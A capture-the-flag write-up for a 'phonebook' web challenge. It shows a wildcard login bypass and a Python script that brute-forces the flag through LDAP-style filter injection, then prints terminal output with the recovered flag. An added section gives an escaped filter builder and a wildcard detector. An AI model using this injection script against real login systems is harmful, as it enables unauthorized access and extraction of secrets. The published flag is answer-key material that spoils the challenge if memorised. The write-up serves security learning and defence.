# Information Gathering

Challenge hint: Who is lucky enough to be included in the phonebook?

The home page also reveals a username, so we can try a universal (bypass) password to get in.

Got in with the wildcard `*` ==、

Then I was at a loss for a while. A few random searches turned up a pile of names, but apart from Reese none of them could be logged into with the wildcard, and there was no sign of a flag anywhere.

After looking it up, I found that the concrete string the wildcard matches is the flag. To verify: using `HTB{*}` as the password also logs in, which means we need to brute-force the password character by character ==、

# Building the Attack

Brute-force script

```python
# -*- coding: utf-8 -*-
"""
Created on Tue May  4 14:11:24 2021
@author: Fstraw
"""
import requests
import string

pw = 'HTB{'
url = 'http://xxx/login'
# HTB flags consist of upper/lower-case letters, digits and underscores.
words = string.ascii_lowercase + string.ascii_uppercase + '0123456789_'
found = False
while not found:
    # Try every candidate character at the current position
    for w in words:
        # Submitted form values: the trailing wildcard makes the prefix match
        data = {'username': 'reese', 'password': pw + w + '*'}
        r = requests.post(url, data)
        length = r.headers['Content-Length']
        # A successful login returns a body of 2586 bytes
        if length == '2586':
            pw = pw + w
            print('==============')
            print(pw)
            # Check whether the flag is already complete
            data = {'username': 'reese', 'password': pw + '}'}
            r = requests.post(url, data)
            if r.headers['Content-Length'] == '2586':
                # Print the flag and stop the outer loop
                print('==============')
                print(pw + '}')
                found = True
            # Leave the for loop and move on to the next position
            break
    else:
        # No character matched at this position; stop instead of looping forever
        break
```
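Added example, not part of the write-up or of the challenge's code: it assumes (the write-up does not say so) that the login builds an LDAP-style search filter straight from the form fields, which is exactly what lets `HTB{*` match as a wildcard. The hardened builder escapes values per RFC 4515 so `*` becomes literal, and `contains_wildcard` is a simple check for such probes; all function names are hypothetical.

```python
# Added example (not from the write-up). Assumption: the login constructs an
# LDAP-style filter from the submitted username and password, so an unescaped
# "*" in the password acts as a wildcard and "HTB{*" matches the stored value.

# RFC 4515 requires these characters to be hex-escaped inside filter values.
_FILTER_ESCAPES = {
    '\\': r'\5c',
    '*': r'\2a',
    '(': r'\28',
    ')': r'\29',
    '\x00': r'\00',
}


def escape_filter_value(value: str) -> str:
    """Escape user input so it is treated as literal text, never as filter syntax."""
    return ''.join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(username: str, password: str) -> str:
    """Vulnerable form: raw input lands inside the filter, so '*' is a wildcard."""
    return f'(&(uid={username})(userPassword={password}))'


def build_filter_safe(username: str, password: str) -> str:
    """Hardened form: every value is escaped before interpolation."""
    return (f'(&(uid={escape_filter_value(username)})'
            f'(userPassword={escape_filter_value(password)}))')


def contains_wildcard(filter_str: str) -> bool:
    """Detection helper: after RFC 4515 escaping a literal '*' never survives,
    so any '*' left in a login filter is a wildcard probe worth logging."""
    return '*' in filter_str


if __name__ == '__main__':
    probe = 'HTB{*'  # the kind of value the write-up submits as a password
    print(build_filter_unsafe('reese', probe))  # wildcard reaches the directory
    print(build_filter_safe('reese', probe))    # '*' is now \2a, a literal byte
```

Searching on a password attribute is itself a weak pattern; binding to the directory with the supplied credentials avoids exposing the stored value to filter matching at all.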

# SHELL

```
┌──(root💀kali)-[~]
└─# python3 1.py                                                     1 ⨯ 1 ⚙
==============
HTB{d
==============
HTB{d1
==============
HTB{d1r
==============
HTB{d1re
==============
HTB{d1rec
==============
HTB{d1rect
==============
HTB{d1recto
==============
HTB{d1rector
==============
HTB{d1rectory
==============
HTB{d1rectory_
==============
HTB{d1rectory_h
==============
HTB{d1rectory_h4
==============
HTB{d1rectory_h4x
==============
HTB{d1rectory_h4xx
==============
HTB{d1rectory_h4xx0
==============
HTB{d1rectory_h4xx0r
==============
HTB{d1rectory_h4xx0r_
==============
HTB{d1rectory_h4xx0r_i
==============
HTB{d1rectory_h4xx0r_is
==============
HTB{d1rectory_h4xx0r_is_
==============
HTB{d1rectory_h4xx0r_is_k
==============
HTB{d1rectory_h4xx0r_is_k0
==============
HTB{d1rectory_h4xx0r_is_k00
==============
HTB{d1rectory_h4xx0r_is_k00l
==============
HTB{d1rectory_h4xx0r_is_k00l}
```